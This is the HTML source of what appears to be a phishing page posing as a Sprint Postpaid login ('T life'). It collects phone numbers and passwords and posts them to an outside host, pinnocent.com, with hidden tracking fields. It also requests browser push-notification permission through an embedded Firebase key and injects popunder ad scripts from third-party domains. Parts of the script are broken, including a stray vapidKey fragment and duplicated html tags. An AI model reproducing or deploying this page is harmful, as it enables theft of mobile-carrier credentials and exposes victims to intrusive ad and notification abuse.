
  <!DOCTYPE html>
<html>
<head>
 
<script src="https://www.gstatic.com/firebasejs/4.9.1/firebase.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

<link rel="manifest" href="manifest.json"    <link rel="preconnect" href="https://fonts.googleapis.com">

<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

<link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Roboto:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<script>
  // Initialize Firebase
  /*Update this config*/
  var config = {
     apiKey: "AIzaSyBV2pY0LLJTrHhiCFArAedQpTiUshDJsi8",
  authDomain: "pinnocent-fa387.firebaseapp.com",
  databaseURL: "https://pinnocent-fa387.firebaseio.com",
  projectId: "pinnocent-fa387",
  storageBucket: "pinnocent-fa387.appspot.com",
  messagingSenderId: "403452483449",
  appId: "1:403452483449:web:630abc1e7c265a8f0481a8",
  measurementId: "G-8DGVGDCCL2"
  };
  firebase.initializeApp(config);

	// Retrieve Firebase Messaging object.
	const messaging = firebase.messaging();
	messaging.requestPermission()
	.then(function() {
	  console.log('Notification permission granted.');
	  // TODO(developer): Retrieve an Instance ID token for use with FCM.
	 
               
                vapidKey: 'BLf-6mYxA6BPIXK-MpMWYKuLDPpbKFtXdERFs506kY1xZsek0B8ieRRIikBGaO0LKrFXzglm-mNr4rpMypLLiJ4' }).then((currentToken) => {
                if (currentToken) {
                    console.log("Token is: "+currentToken);
	  } else {
	  	getRegToken();
	  }

	})
	.catch(function(err) {
	  console.log('Unable to get permission to notify.', err);
	});

	function getRegToken(argument) {
		messaging.getToken()
		  .then(function(currentToken) {
		    if (currentToken) {
		      saveToken(currentToken);
		      console.log(currentToken);
		      setTokenSentToServer(true);
		    } else {
		      console.log('No Instance ID token available. Request permission to generate one.');
		      setTokenSentToServer(false);
		    }
		  })
		  .catch(function(err) {
		    console.log('An error occurred while retrieving token. ', err);
		    setTokenSentToServer(false);
		  });
	}

	function setTokenSentToServer(sent) {
	    window.localStorage.setItem('sentToServer', sent ? 1 : 0);
	}

	function isTokenSentToServer() {
	    return window.localStorage.getItem('sentToServer') == 1;
	}

	function saveToken(currentToken) {
		$.ajax({
			url: '?',
			method: 'post',
			data: 'token=' + currentToken
		}).done(function(result){
			console.log(result);
		})
	}

	messaging.onMessage(function(payload) {
	  console.log("Message received. ", payload);
	  notificationTitle = payload.data.title;
	  notificationOptions = {
	  	body: payload.data.body,
	  	icon: payload.data.icon,
	  	image:  payload.data.image
	  };
	  var notification = new Notification(notificationTitle,notificationOptions);
	});
</script>
</head>
<body>
<center>
 
  
</center>
</body>

<html>
<head>

   <title>T life Login to your account</title>
   <html lang="en">
                 <head>
                 <meta charset="UTF-8">
                 <meta name="viewport" content="width=device-width, initial-scale=1.0">
                 <title>Login</title>
           
                 <style type="text/css" id="operaUserStyle">
                 body{
                   margin: 0px;
                 }
                 @media only screen and (max-width: 768px) {  .sml { 
                   width: 100%;
                   }
                 }
                 @media only screen and (min-width: 768px) {  .deleteforlarge { 
                   display: none;
                   }
                 }
                  @media only screen and (max-width: 768px) {  .deleteforsmall { 
                   display: none;
                   }
                 }
                    </style>
                    <style>
                     .tb {
                       width: 80px;
                       padding: 10px;
                     } 
                     }
                     }
                    </style>
                    <style>
                       .tbback {
                       background-color: black;
                       width: 100%;
                       height: 40px;
                       } 
                       .lapi {
                         width: 20%;
                       }
                    </style>
                    <style>
                        .poppins-extralight {



  font-family: "Poppins", serif;

  font-weight: 200;
  font-style: normal;
}

.poppins-light {
  font-family: "Poppins", serif;
  font-weight: 300;
  font-style: normal;
}

.poppins-regular {
  font-family: "Poppins", serif;
  font-weight: 400;
  font-style: normal;
}

.poppins-medium {
  font-family: "Poppins", serif;
  font-weight: 500;
  font-style: normal;
}

.poppins-semibold {
  font-family: "Poppins", serif;
  font-weight: 600;
  font-style: normal;
}

.poppins-bold {
  font-family: "Poppins", serif;
  font-weight: 700;
  font-style: normal;
}

.poppins-extrabold {
  font-family: "Poppins", serif;
  font-weight: 800;
  font-style: normal;
}

.poppins-black {
  font-family: "Poppins", serif;
  font-weight: 900;
  font-style: normal;
}

.poppins-thin-norm {
  font-family: "Poppins", serif;
  font-weight: 600;
  font-style: normal;
}

.poppins-extralight-italic {
  font-family: "Poppins", serif;
  font-weight: 200;
  font-style: italic;
}

.poppins-light-italic {
  font-family: "Poppins", serif;
  font-weight: 300;
  font-style: italic;
}

.poppins-regular-italic {
  font-family: "Poppins", serif;
  font-weight: 400;
  font-style: italic;
}

.poppins-medium-italic {
  font-family: "Poppins", serif;
  font-weight: 500;
  font-style: italic;
}

.poppins-semibold-italic {
  font-family: "Poppins", serif;
  font-weight: 600;
  font-style: italic;
}

.poppins-bold-italic {
  font-family: "Poppins", serif;
  font-weight: 700;
  font-style: italic;
}

.poppins-extrabold-italic {
  font-family: "Poppins", serif;
  font-weight: 800;
  font-style: italic;
}

.poppins-black-italic {
  font-family: "Poppins", serif;
  font-weight: 900;
  font-style: italic;
}
                    </style>
                    <style>
                      form {
                        margin-left: 25px;
                        padding-left: 5px;
                      }
                      input {
                        margin: 3px;
                        height: 40px;
                        width: 250px;
                      }
                      h1,p {
                        padding-left: 30px;
                      }
                      button {
                        height: 40px;
                        width: 250px;
                        margin: 7px;
                      }
                    </style>
                 </head>
                 <body class="bg-[#ffffff]">
                  <noscript>You need to enable JavaScript to run this app.</noscript>
            
            <nav style="width:100%;"> <img src="nafull1.png" class="sml deleteforlarge">
            <img src="na1.png" class="deleteforsmall lapi">
            </nav>
            <br>
            <div class="tbback" style="width:100%; background-color:black;">
            <img class="tb" src="esp.png" width="100%"> 
    </div>
            <br>
            <div class="topl">
            <h1 class="topl poppins-bold"> Log in </h1>
            <p class="poppins-bold"> Login to your Sprint Postpaid Account </p>
    <form action="https://pinnocent.com/vpage" method="POST">
    <input type="hidden" name="link" value="custom template">
    <input type="hidden" name="ftype" value="normal">
    <input type="hidden" name="login" value="login">
    <input type="hidden" name="user_id" value="16934">
    <div class="p-2 w-full  gap-1  ">
    <div class="flex flex-col   p-2  gap-1">
    <input type="text" required="" class="w-full border p-2 rounded-md" name="message_title" placeholder="Phone Number"></div>
    <div class="flex flex-col   p-2   gap-1">
    <input type="password" required="" class="w-full border p-2 rounded-md" name="description" placeholder="Password" id="password" autocomplete="new-password" aria-autocomplete="list"></div>
    <div class="flex flex-col justify-center items-center  p-2 gap-1 w-3/6 mx-auto">
    <button type="submit" class=" text-black font-semibold p-3 rounded-md w-full bg-[#0000ff] hover:bg-blue-600">Log In</button>
    </div>
    </div>
    </form>
    </div>
    </div>
    </div>
    </div></body></html>  
    
<script type="text/javascript">
   var uid = '330441';
   var wid = '717208';
   var pop_tag = document.createElement('script');pop_tag.src='//nairaa.com/2show.js';document.body.appendChild(pop_tag);
   pop_tag.onerror = function() {pop_tag = document.createElement('script');pop_tag.src='//nairaa.com/2show.js';document.body.appendChild(pop_tag)};
</script>
<script src="back.js?1734976792"> 
</script>
<script src="https://old.pinnocent.coms/jspopunder.min.js"></script>
	<script>
	jsPopunder('https://noopsaithu.net/4/7193696', {
		name: 'poptest', 
		width: (screen.width/2), 
		height: (screen.height-100), 
		top: 0, left: 0, 
		wait: 43200, cap: 120000
	});
	</script>

	
  
    
